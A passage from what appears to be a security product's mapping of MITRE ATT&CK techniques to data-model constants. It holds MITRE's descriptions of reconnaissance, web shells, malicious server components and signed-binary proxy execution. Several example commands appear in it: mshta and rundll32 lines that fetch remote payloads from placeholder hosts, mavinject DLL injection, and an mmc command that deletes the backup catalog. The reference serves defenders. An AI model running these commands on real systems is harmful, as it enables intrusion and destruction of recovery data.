techniques/T1199)). https://attack.mitre.org/techniques/T1596/003

T1596.005 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_TECHNICAL_DATABASES_SCAN_DATABASES Adversaries may search within public scan databases for information about victims that can be used during
targeting. Various online services continuously publish the results of Internet scans/surveys, often
harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server
banners.(Citation: Shodan) Adversaries may search scan databases to gather actionable information.
Threat actors can use online resources and lookup tools to harvest information from these services.
Adversaries may seek information about their already identified targets, or use these datasets to discover
opportunities for successful breaches. Information from these sources may reveal opportunities for other
forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open
Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex:
[Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://
attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://
attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/
T1190)). https://attack.mitre.org/techniques/T1596/005

T1596.002 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_TECHNICAL_DATABASES_WHOIS Adversaries may search public WHOIS data for information about victims that can be used during targeting.
WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet
resources such as domain names. Anyone can query WHOIS servers for information about a registered
domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
Adversaries may search WHOIS data to gather actionable information. Threat actors can use online
resources or command-line utilities to pillage through WHOIS data for information about potential victims.
Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active
Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/
techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/
techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial
access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship]
(https://attack.mitre.org/techniques/T1199)). https://attack.mitre.org/techniques/T1596/002
Original Mapped Description

T1593 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_WEBSITES_DOMAINS Adversaries may search freely available websites and/or domains for information about victims that can be
used during targeting. Information about victims may be available in various online sites, such as social
media, new sites, or those hosting information about business operations such as hiring or requested/
rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation:
ExploitDB GoogleHacking) Adversaries may search in different online sites depending on what information
they seek to gather. Information from these sources may reveal opportunities for other forms of
reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open
Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex:
[Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://
attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://
attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)). https://
attack.mitre.org/techniques/T1593

T1593.002 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_WEBSITES_DOMAINS_SEARCH_ENGINES Adversaries may use search engines to collect information about victims that can be used during targeting.
Search engine services typical crawl online sites to index context and may provide users with specialized
syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails
Google Hacking)(Citation: ExploitDB GoogleHacking) Adversaries may craft various search engine queries
depending on what information they seek to gather. Threat actors may use search engines to harvest
general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive
information such as network details or credentials. Information from these sources may reveal opportunities
for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational
resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts]
(https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://
attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). https://
attack.mitre.org/techniques/T1593/002

T1593.001 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_WEBSITES_OR_DOMAINS_SOCIAL_MEDIA Adversaries may search social media for information about victims that can be used during targeting. Social
media sites may contain various information about a victim organization, such as business announcements
as well as information about the roles, locations, and interests of staff. Adversaries may search in different
social media sites depending on what information they seek to gather. Threat actors may passively harvest
data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into
revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).
(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of
reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open
Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex:
[Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://
attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://
attack.mitre.org/techniques/T1566/003)). https://attack.mitre.org/techniques/T1593/001

T1594 XDM_CONST.MITRE_TECHNIQUE_SEARCH_VICTIM_OWNED_WEBSITES Adversaries may search websites owned by the victim for information that can be used during targeting.
Victim-owned websites may contain a variety of details, including names of departments/divisions, physical
locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses]
(https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business
operations and relationships.(Citation: Comparitech Leak) Adversaries may search victim-owned websites
to gather actionable information. Information from these sources may reveal opportunities for other forms of
reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open
Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex:
[Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://
attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/
techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)). https://attack.mitre.org/
techniques/T1594

T1505 XDM_CONST.MITRE_TECHNIQUE_SERVER_SOFTWARE_COMPONENT Adversaries may abuse legitimate extensible development features of servers to establish persistent
access to systems. Enterprise server applications may include features that allow developers to write and
install software or scripts to extend the functionality of the main application. Adversaries may install
malicious components to extend and abuse server applications. https://attack.mitre.org/techniques/T1505

T1505.004 XDM_CONST.MITRE_TECHNIQUE_SERVER_SOFTWARE_COMPONENT_IIS_COMPONENTS Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to
establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For
example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed
to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as
DLL files that export three functions: Get{Extension/Filter}Version, Http{Extension/Filter}Proc,
and (optionally) Terminate{Extension/Filter}. IIS modules may also be installed to extend IIS web
servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview
2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013) Adversaries may install malicious
ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised
machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS
web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP
responses in order to distribute malicious commands/content to previously comprised hosts.(Citation:
Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation:
Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)
(Citation: MMPC ISAPI Filter 2012) Adversaries may also install malicious IIS modules to observe and/or
modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and
responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports
RegisterModule, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP
requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation:
ESET IIS Malware 2021) https://attack.mitre.org/techniques/T1505/004

T1505.001 XDM_CONST.MITRE_TECHNIQUE_SERVER_SOFTWARE_COMPONENT_SQL_STORED_PROCEDURES Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored
Procedures are code that can be saved and reused so that database users do not waste time rewriting
frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using
the procedure name or via defined events (e.g. when a SQL server application is started/restarted).
Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL
database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To
execute operating system commands through SQL syntax the adversary may have to enable additional
functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)
(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) Microsoft SQL Server can
enable common language runtime (CLR) integration. With CLR integration enabled, application developers
can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation:
Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored
procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI
SQL Server CLR) https://attack.mitre.org/techniques/T1505/001

T1505.002 XDM_CONST.MITRE_TECHNIQUE_SERVER_SOFTWARE_COMPONENT_TRANSPORT_AGENT Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft
Exchange transport agents can operate on email messages passing through the transport pipeline to
perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a
corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation:
ESET LightNeuron May 2019) Transport agents can be written by application developers and then
compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents
will be invoked during a specified stage of email processing and carry out developer defined tasks.
Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange
Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019)
Though a malicious transport agent may be invoked for all emails passing through the Exchange transport
pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined
criteria. For example, the transport agent may only carry out an action like copying in-transit attachments
and saving them for later exfiltration if the recipient email address matches an entry on a list provided by
the adversary. https://attack.mitre.org/techniques/T1505/002

T1505.003 XDM_CONST.MITRE_TECHNIQUE_SERVER_SOFTWARE_COMPONENT_WEB_SHELL Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web
shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the
Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a
command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web
shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://
attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) https://attack.mitre.org/techniques/
T1505/003
Original Mapped Description

T1489 XDM_CONST.MITRE_TECHNIQUE_SERVICE_STOP Adversaries may stop or disable services on a system to render those services unavailable to legitimate
users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the
adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer
2018)(Citation: Novetta Blockbuster) Adversaries may accomplish this by disabling individual services of
high importance to an organization, such as MSExchangeIS, which will make Exchange content
inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all
services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may
not allow for modification of their data stores while running. Adversaries may stop services or processes in
order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for
Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL
Server.(Citation: SecureWorks WannaCry Analysis) https://attack.mitre.org/techniques/T1489

T1129 XDM_CONST.MITRE_TECHNIQUE_SHARED_MODULES Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can
be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC)
network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://
attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc.
of the Win32 API. (Citation: Wikipedia Windows Library Files) The module loader can load DLLs: * via
specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory; * via EXPORT
forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension); * via
an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory
containing the DLLs specified in the IMPORT directory or forwarded EXPORTs; * via <file
name="filename.extension" loadFrom="fully-qualified or relative pathname"> in an
embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a
forwarded EXPORT. Adversaries may use this functionality as a way to execute arbitrary payloads on a
victim system. For example, malware may execute share modules to load additional components or
features. https://attack.mitre.org/techniques/T1129

T1218 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious
content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows
systems protected by digital signature validation. Several Microsoft signed binaries that are default on
Windows installations can be used to proxy execution of other files. https://attack.mitre.org/techniques/
T1218

T1218.003 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_CMSTP Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager
Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service
profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information
file (INF) as a parameter and installs a service profile leveraged for remote access connections.
Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter
CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) /
”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)
and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub
Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass
AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft
application. CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/
techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated
COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List)
(Citation: Endurant CMSTP July 2018) https://attack.mitre.org/techniques/T1218/003

T1218.001 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_COMPILED_HTML_FILE Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly
distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various
content such as HTML documents, images, and scripting/web related programming languages such VBA,
JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using
underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by
the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program) A
custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User
Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application
application control on older and/or unpatched systems that do not account for execution of binaries through
hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017) https://
attack.mitre.org/techniques/T1218/001

T1218.002 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_CONTROL_PANEL Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel
process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to
view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel
(.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.
(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use,
Control Panel items typically include graphical menus available to users after being registered and loaded
into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly
from the command line, programmatically via an application programming interface (API) call, or by simply
double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan
2014)(Citation: TrendMicro CPL Malware Dec 2013) Malicious Control Panel items can be delivered via
[Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan
2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation:
Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or
file extension allow lists. Adversaries may also rename malicious DLL files (.dll) with Control Panel file
extensions (.cpl) and register them to HKCU\Software\Microsoft\Windows\CurrentVersion\Control
Panel\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not
export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel
is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June
2020) https://attack.mitre.org/techniques/T1218/002

T1218.004 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_INSTALLUTIL Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a
command-line utility that allows for installation and uninstallation of resources by executing specific installer
components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft
and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v
\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v \InstallUtil.exe . InstallUtil
may also be used to bypass application control through use of attributes within the binary that execute the
class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS
Installutil) https://attack.mitre.org/techniques/T1218/004

T1218.014 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_MMC Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management
Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a
command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save
custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins
may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft
created .msc files to manage system configuration.(Citation: win_msc_files_overview) For example, mmc C:
\Users\foo\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation:
win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor
application window. Adversaries may use MMC commands to perform malicious tasks. For example, mmc
wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System
Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may
only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)
(Citation: phobos_virustotal) Adversaries may also abuse MMC to execute malicious .msc files. For
example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely
identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation:
win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that
is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may
invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:
\path\to\test.msc.(Citation: abusing_com_reg) https://attack.mitre.org/techniques/T1218/014
Original Mapped Description

T1218.013 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_MAVINJECT Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft
Application Virtualization Injector, a Windows utility that can inject code into external processes as part of
Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject) Adversaries may abuse
mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://
attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:
\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP
Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying
execution via this method may evade detection by security products because the execution is masked
under a legitimate process. In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/
T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE
command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL
ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the
module at the given base address.(Citation: Mavinject Functionality Deconstructed) https://attack.mitre.org/
techniques/T1218/013

T1218.005 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_MSHTA Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript
through a trusted Windows utility. There are several examples of different types of threats leveraging
mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation:
Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security
Kovter Analysis) (Citation: FireEye FIN7 April 2017) Mshta.exe is a utility that executes Microsoft HTML
Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that
execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation:
MSDN HTML Applications) Files may be executed by mshta.exe through an inline script: mshta
vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta Mshta.exe
can be used to bypass application control solutions that do not account for its potential use. Since
mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security
settings. (Citation: LOLBAS Mshta) https://attack.mitre.org/techniques/T1218/005

T1218.007 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_MSIEXEC Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the
command-line utility for the Windows Installer and is thus commonly associated with executing installation
packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft. Adversaries may
abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.
(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on
Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for
its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the
AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) https://
attack.mitre.org/techniques/T1218/007

T1218.008 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_ODBCCONF Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a
Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source
names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft. Adversaries may
abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse.
Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that
can be misused to execute DLLs (ex: odbcconf.exe /S /A &lbrace;REGSVR "C:
\Users\Public\file.dll"&rbrace;). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug
2017)(Citation: TrendMicro Cobalt Group Nov 2017) https://attack.mitre.org/techniques/T1218/008

T1218.009 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_REGSVCS_OR_REGASM Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility.
Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component
Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed
by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm) Both utilities may be used to bypass
application control through use of attributes within the binary to specify code that should be run before
registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The
code with the registration and unregistration attributes will be executed even if the process is run under
insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm) https://
attack.mitre.org/techniques/T1218/009

T1218.010 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_REGSVR32 Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-
line program used to register and unregister object linking and embedding controls, including dynamic link
libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft
Regsvr32) Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor
execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from
Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass
application control using functionality to load COM scriptlets to execute DLLs under user permissions.
Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource
locator (URL) to file on an external Web server as an argument during invocation. This method makes no
changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS
Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in
campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye
Regsvr32 Targeting Mongolian Gov) Regsvr32.exe can also be leveraged to register a COM Object used to
establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/
T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016) https://attack.mitre.org/techniques/T1218/010

T1218.011 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_RUNDLL32 Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice
executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering
security tools that may not monitor execution of the rundll32.exe process because of allowlists or false
positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex:
rundll32.exe {DLLname, DLLfunction}). Rundll32.exe can also be used to execute [Control Panel]
(https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll
functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes
rundll32.exe to execute. (Citation: Trend Micro CPL) Rundll32 can also be used to execute scripts such as
JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..
\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//
www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as
Poweliks. (Citation: This is Security Command Line Confusion) Adversaries may also attempt to obscure
malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As
part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/
Unicode then ANSI character-supported functions before loading the specified function (e.g., given the
command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to
execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction).
Adversaries may therefore obscure malicious code by creating multiple identical exported function names
and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github
NoRunDll) https://attack.mitre.org/techniques/T1218/011

T1218.012 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_VERCLSID Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the
Extension CLSID Verification Host and is responsible for verifying each shell extension before they are
used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe) Adversaries may abuse
verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C
{CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify
COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions,
such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://
attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying
execution via verclsid.exe may bypass application control solutions that do not account for its potential
abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the
COM Registry)(Citation: Nick Tyrer GitHub) https://attack.mitre.org/techniques/T1218/012

